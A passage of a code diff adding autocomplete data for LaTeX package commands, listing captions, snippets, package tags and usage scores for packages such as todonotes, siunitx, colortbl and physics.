'lineno-cmd', + score: 0.0027194991933605197, + }, + { + caption: '\\fileversion{}', + snippet: '\\fileversion{$1}', + meta: 'lineno-cmd', + score: 0.000578146635331119, + }, + { + caption: '\\fileversion', + snippet: '\\fileversion', + meta: 'lineno-cmd', + score: 0.000578146635331119, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'lineno-cmd', + score: 0.008565354665444157, + }, + ], + mathptmx: [ + { + caption: '\\rmdefault', + snippet: '\\rmdefault', + meta: 'mathptmx-cmd', + score: 0.0012870877747432935, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'mathptmx-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'mathptmx-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'mathptmx-cmd', + score: 0.05613164277964739, + }, + ], + todonotes: [ + { + caption: '\\missingfigure[]{}', + snippet: '\\missingfigure[$1]{$2}', + meta: 'todonotes-cmd', + score: 0.001558719179721163, + }, + { + caption: '\\missingfigure', + snippet: '\\missingfigure', + meta: 'todonotes-cmd', + score: 0.001558719179721163, + }, + { + caption: '\\todototoc', + snippet: '\\todototoc', + meta: 'todonotes-cmd', + score: 0.000325977535138643, + }, + { + caption: '\\todo{}', + snippet: '\\todo{$1}', + meta: 'todonotes-cmd', + score: 0.04115074278362878, + }, + { + caption: '\\todo[]{}', + snippet: '\\todo[$1]{$2}', + meta: 'todonotes-cmd', + score: 0.04115074278362878, + }, + { + caption: '\\todo', + snippet: '\\todo', + meta: 'todonotes-cmd', + score: 0.04115074278362878, + }, + { + caption: '\\listoftodos', + snippet: '\\listoftodos', + meta: 'todonotes-cmd', + score: 0.0005325975940754609, + }, + { + caption: '\\listoftodos[]', + snippet: '\\listoftodos[$1]', + meta: 'todonotes-cmd', + score: 0.0005325975940754609, + }, + { + caption: '\\phantomsection', + snippet: '\\phantomsection', + meta: 'todonotes-cmd', + score: 0.0174633138331273, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'todonotes-cmd', + score: 0.021170869458413965, + }, + { + caption: 
'\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'todonotes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'todonotes-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'todonotes-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'todonotes-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'todonotes-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'todonotes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'todonotes-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'todonotes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'todonotes-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'todonotes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'todonotes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'todonotes-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'todonotes-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'todonotes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'todonotes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'todonotes-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'todonotes-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'todonotes-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'todonotes-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'todonotes-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'todonotes-cmd', + 
score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'todonotes-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'todonotes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'todonotes-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'todonotes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'todonotes-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'todonotes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'todonotes-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'todonotes-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'todonotes-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'todonotes-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'todonotes-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'todonotes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'todonotes-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'todonotes-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'todonotes-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'todonotes-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'todonotes-cmd', + score: 0.2864294797053033, + }, + ], + ulem: [ + { + caption: '\\sout{}', + snippet: '\\sout{$1}', + meta: 'ulem-cmd', + score: 0.0010443313503631364, + }, + { + caption: '\\sout', + snippet: '\\sout', + meta: 'ulem-cmd', + score: 0.0010443313503631364, + }, + { + caption: '\\MakeRobust', + snippet: '\\MakeRobust', + meta: 'ulem-cmd', + score: 3.140504277052775e-5, + }, + { + caption: '\\hss', + snippet: '\\hss', + meta: 'ulem-cmd', + score: 0.0020627882815078768, + }, + { + caption: '\\uline{}', + snippet: '\\uline{$1}', + meta: 'ulem-cmd', + score: 0.005956273219192909, + }, + { + caption: '\\uline', + snippet: '\\uline', + meta: 'ulem-cmd', + score: 0.005956273219192909, + }, + { + caption: '\\markoverwith{}', + snippet: '\\markoverwith{$1}', + meta: 'ulem-cmd', + score: 0.0004888431085285657, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'ulem-cmd', + score: 0.004209937150980285, + }, + { + 
caption: '\\hfill', + snippet: '\\hfill', + meta: 'ulem-cmd', + score: 0.2058248088519886, + }, + { + caption: '\\ULon', + snippet: '\\ULon', + meta: 'ulem-cmd', + score: 0.0004888431085285657, + }, + { + caption: '\\normalem', + snippet: '\\normalem', + meta: 'ulem-cmd', + score: 0.00015564484081028078, + }, + { + caption: '\\useunder{}{}{}', + snippet: '\\useunder{$1}{$2}{$3}', + meta: 'ulem-cmd', + score: 0.0013185833851097916, + }, + { + caption: '\\hfil', + snippet: '\\hfil', + meta: 'ulem-cmd', + score: 0.006880789969115855, + }, + ], + gensymb: [ + { + caption: '\\degree', + snippet: '\\degree', + meta: 'gensymb-cmd', + score: 0.044752043138360405, + }, + { + caption: '\\ohm', + snippet: '\\ohm', + meta: 'gensymb-cmd', + score: 0.0038146685721293138, + }, + { + caption: '\\micro', + snippet: '\\micro', + meta: 'gensymb-cmd', + score: 0.011051971930487929, + }, + { + caption: '\\celsius', + snippet: '\\celsius', + meta: 'gensymb-cmd', + score: 0.0010806983851157788, + }, + ], + siunitx: [ + { + caption: '\\DeclareSIUnit{}{}', + snippet: '\\DeclareSIUnit{$1}{$2}', + meta: 'siunitx-cmd', + score: 0.00017911905960739648, + }, + { + caption: '\\DeclareSIUnit', + snippet: '\\DeclareSIUnit', + meta: 'siunitx-cmd', + score: 0.00017911905960739648, + }, + { + caption: '\\si{}', + snippet: '\\si{$1}', + meta: 'siunitx-cmd', + score: 0.015042996547458706, + }, + { + caption: '\\num{}', + snippet: '\\num{$1}', + meta: 'siunitx-cmd', + score: 0.0005077454796577224, + }, + { + caption: '\\num[]{}', + snippet: '\\num[$1]{$2}', + meta: 'siunitx-cmd', + score: 0.0005077454796577224, + }, + { + caption: '\\ang{}', + snippet: '\\ang{$1}', + meta: 'siunitx-cmd', + score: 0.00026216419341458844, + }, + { + caption: '\\SIrange{}{}{}', + snippet: '\\SIrange{$1}{$2}{$3}', + meta: 'siunitx-cmd', + score: 0.0004920776847142836, + }, + { + caption: '\\SIrange[]{}{}{}', + snippet: '\\SIrange[$1]{$2}{$3}{$4}', + meta: 'siunitx-cmd', + score: 0.0004920776847142836, + }, + { + caption: '\\SIlist{}{}', + snippet: '\\SIlist{$1}{$2}', + meta: 'siunitx-cmd', + score: 2.5005836362206937e-5, + }, + { + caption: '\\SI{}{}', + 
snippet: '\\SI{$1}{$2}', + meta: 'siunitx-cmd', + score: 0.04233098901537305, + }, + { + caption: '\\sisetup{}', + snippet: '\\sisetup{$1}', + meta: 'siunitx-cmd', + score: 0.0011875061630332172, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'siunitx-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'siunitx-cmd', + score: 0.0063276692758974925, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'siunitx-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'siunitx-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'siunitx-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'siunitx-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'siunitx-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'siunitx-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'siunitx-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'siunitx-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'siunitx-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'siunitx-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'siunitx-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'siunitx-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'siunitx-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'siunitx-cmd', + score: 0.2864294797053033, + }, + ], + adjustbox: [ + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'adjustbox-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'adjustbox-cmd', + score: 0.354445763583904, + }, + { + caption: '\\adjustbox{}{}', + snippet: '\\adjustbox{$1}{$2}', + meta: 'adjustbox-cmd', + score: 0.002008185536556013, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'adjustbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'adjustbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'adjustbox-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'adjustbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'adjustbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'adjustbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'adjustbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'adjustbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: 
'\\expandafter{$1}', + meta: 'adjustbox-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'adjustbox-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'adjustbox-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'adjustbox-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'adjustbox-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'adjustbox-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'adjustbox-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'adjustbox-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'adjustbox-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'adjustbox-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'adjustbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'adjustbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'adjustbox-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'adjustbox-cmd', + score: 0.004649150613625593, + }, + ], + moderncvcompatibility: [ + { + caption: '\\cvitem{}{}', + snippet: '\\cvitem{$1}{$2}', + meta: 'moderncvcompatibility-cmd', + score: 0.19605476980016281, + }, + { + caption: '\\cvlanguage{}{}{}', + snippet: '\\cvlanguage{$1}{$2}{$3}', + meta: 'moderncvcompatibility-cmd', + score: 0.00832363305853651, + }, + { + caption: '\\moderncvtheme[]{}', + snippet: '\\moderncvtheme[$1]{$2}', + meta: 'moderncvcompatibility-cmd', + score: 0.002355125248305291, + }, + { + caption: '\\moderncvtheme{}', + snippet: '\\moderncvtheme{$1}', + meta: 'moderncvcompatibility-cmd', + score: 0.002355125248305291, + }, + { + caption: '\\maketitle', + snippet: '\\maketitle', + meta: 'moderncvcompatibility-cmd', + score: 0.7504160124360846, + }, + { + caption: '\\phone[]{}', + snippet: '\\phone[$1]{$2}', + meta: 'moderncvcompatibility-cmd', + score: 0.09602264063533228, + }, + { + caption: '\\moderncvstyle{}', + snippet: '\\moderncvstyle{$1}', + meta: 'moderncvcompatibility-cmd', + score: 0.09378844125415692, + }, + { + caption: '\\firstname{}', + snippet: '\\firstname{$1}', + meta: 'moderncvcompatibility-cmd', + score: 0.0070031590875754435, + }, + { + caption: '\\cvline{}{}', + snippet: '\\cvline{$1}{$2}', + meta: 'moderncvcompatibility-cmd', + score: 0.007378490468121007, + }, + { + caption: '\\mobile{}', + snippet: '\\mobile{$1}', + meta: 'moderncvcompatibility-cmd', + score: 0.022907406369946367, + }, + { + caption: '\\familyname{}', + snippet: '\\familyname{$1}', + meta: 'moderncvcompatibility-cmd', + score: 0.0070031590875754435, + }, + { + caption: '\\section{}', + snippet: '\\section{$1}', + meta: 'moderncvcompatibility-cmd', + score: 3.0952612541683835, + }, + ], + helvet: [ + { + caption: '\\sfdefault', + snippet: '\\sfdefault', + meta: 'helvet-cmd', 
+ score: 0.008427383388519996, + }, + { + caption: '\\sfdefault{}', + snippet: '\\sfdefault{$1}', + meta: 'helvet-cmd', + score: 0.008427383388519996, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'helvet-cmd', + score: 0.00037306820619479756, + }, + ], + placeins: [ + { + caption: '\\FloatBarrier', + snippet: '\\FloatBarrier', + meta: 'placeins-cmd', + score: 0.015841933780270347, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'placeins-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'placeins-cmd', + score: 0.021170869458413965, + }, + ], + colortbl: [ + { + caption: '\\rowcolor{}', + snippet: '\\rowcolor{$1}', + meta: 'colortbl-cmd', + score: 0.05564476491638024, + }, + { + caption: '\\rowcolor[]{}', + snippet: '\\rowcolor[$1]{$2}', + meta: 'colortbl-cmd', + score: 0.05564476491638024, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'colortbl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'colortbl-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\arrayrulecolor{}', + snippet: '\\arrayrulecolor{$1}', + meta: 'colortbl-cmd', + score: 0.008538501902241319, + }, + { + caption: '\\arrayrulecolor[]{}', + snippet: '\\arrayrulecolor[$1]{$2}', + meta: 'colortbl-cmd', + score: 0.008538501902241319, + }, + { + caption: '\\hline', + snippet: '\\hline', + meta: 'colortbl-cmd', + score: 1.3209538327406387, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'colortbl-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\cellcolor[]{}', + snippet: '\\cellcolor[$1]{$2}', + meta: 'colortbl-cmd', + score: 0.11068275858524645, + }, + { + caption: '\\cellcolor{}', + snippet: '\\cellcolor{$1}', + meta: 'colortbl-cmd', + score: 0.11068275858524645, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'colortbl-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'colortbl-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'colortbl-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'colortbl-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'colortbl-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'colortbl-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'colortbl-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'colortbl-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'colortbl-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'colortbl-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'colortbl-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'colortbl-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'colortbl-cmd', + 
score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'colortbl-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'colortbl-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'colortbl-cmd', + score: 0.2864294797053033, + }, + ], + appendix: [ + { + caption: '\\appendixpagename', + snippet: '\\appendixpagename', + meta: 'appendix-cmd', + score: 0.0005082989114039268, + }, + { + caption: '\\appendixpagename{}', + snippet: '\\appendixpagename{$1}', + meta: 'appendix-cmd', + score: 0.0005082989114039268, + }, + { + caption: '\\thechapter', + snippet: '\\thechapter', + meta: 'appendix-cmd', + score: 0.011821300392639589, + }, + { + caption: '\\sectionmark', + snippet: '\\sectionmark', + meta: 'appendix-cmd', + score: 0.005008938879210868, + }, + { + caption: '\\thesubsection', + snippet: '\\thesubsection', + meta: 'appendix-cmd', + score: 0.004364729212023423, + }, + { + caption: '\\appendixname', + snippet: '\\appendixname', + meta: 'appendix-cmd', + score: 0.006491295958752496, + }, + { + caption: '\\appendixname{}', + snippet: '\\appendixname{$1}', + meta: 'appendix-cmd', + score: 0.006491295958752496, + }, + { + caption: '\\addcontentsline{}{}{}', + snippet: '\\addcontentsline{$1}{$2}{$3}', + meta: 'appendix-cmd', + score: 0.07503475348393239, + }, + { + caption: '\\thesection', + snippet: '\\thesection', + meta: 'appendix-cmd', + score: 0.011068945893347528, + }, + { + caption: '\\thesection{}', + snippet: '\\thesection{$1}', + meta: 'appendix-cmd', + score: 0.011068945893347528, + }, + { + caption: '\\appendixpage', + snippet: '\\appendixpage', + meta: 'appendix-cmd', + score: 0.0003193786370376004, + }, + { + caption: '\\appendixpage{}', + snippet: '\\appendixpage{$1}', + meta: 'appendix-cmd', + score: 0.0003193786370376004, + }, + { + caption: '\\appendixtocname', + snippet: '\\appendixtocname', + meta: 'appendix-cmd', + score: 0.0005082989114039268, + }, + { + caption: '\\appendixtocname{}', + snippet: '\\appendixtocname{$1}', + meta: 'appendix-cmd', + score: 0.0005082989114039268, + }, + { + caption: '\\phantomsection', + snippet: '\\phantomsection', + meta: 'appendix-cmd', + score: 0.0174633138331273, + }, + ], + supertabular: [ + { + caption: '\\tabletail{}', + snippet: '\\tabletail{$1}', + meta: 'supertabular-cmd', + score: 0.00284734590996941, + }, + { + caption: '\\tablehead{}', + snippet: '\\tablehead{$1}', + meta: 'supertabular-cmd', + score: 0.002940437317353234, + }, + { + caption: '\\tablelasttail{}', + snippet: '\\tablelasttail{$1}', + meta: 'supertabular-cmd', + score: 0.00284734590996941, + }, + { + caption: '\\tablefirsthead{}', + snippet: '\\tablefirsthead{$1}', + meta: 'supertabular-cmd', + score: 0.00284734590996941, + }, + ], + makeidx: [ + { + caption: '\\printindex', + snippet: '\\printindex', + meta: 'makeidx-cmd', + score: 0.004417016910870522, + }, + ], + framed: [ + { + caption: '\\fbox{}', + snippet: '\\fbox{$1}', + meta: 'framed-cmd', + score: 0.020865450075016792, + }, + ], + layaureo: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'layaureo-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'layaureo-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'layaureo-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + 
snippet: '\\setlength', + meta: 'layaureo-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'layaureo-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'layaureo-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'layaureo-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'layaureo-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'layaureo-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'layaureo-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\savegeometry{}', + snippet: '\\savegeometry{$1}', + meta: 'layaureo-cmd', + score: 6.461638865465447e-5, + }, + { + caption: '\\loadgeometry{}', + snippet: '\\loadgeometry{$1}', + meta: 'layaureo-cmd', + score: 6.461638865465447e-5, + }, + { + caption: '\\newgeometry{}', + snippet: '\\newgeometry{$1}', + meta: 'layaureo-cmd', + score: 0.0025977479207639352, + }, + { + caption: '\\geometry{}', + snippet: '\\geometry{$1}', + meta: 'layaureo-cmd', + score: 0.046218420429973615, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'layaureo-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\restoregeometry', + snippet: '\\restoregeometry', + meta: 'layaureo-cmd', + score: 0.0007546303842143648, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'layaureo-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'layaureo-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'layaureo-cmd', + score: 0.002958865219480927, + }, + ], + keyval: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'keyval-cmd', + score: 0.00037306820619479756, + }, + ], + physics: [ + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'physics-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'physics-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\curl{}', + snippet: '\\curl{$1}', + meta: 'physics-cmd', + score: 0.001039136354388696, + }, + { + caption: '\\curl', + snippet: '\\curl', + meta: 'physics-cmd', + score: 0.001039136354388696, + }, + { + caption: '\\dd', + snippet: '\\dd', + meta: 'physics-cmd', + score: 0.0049652819784537965, + }, + { + 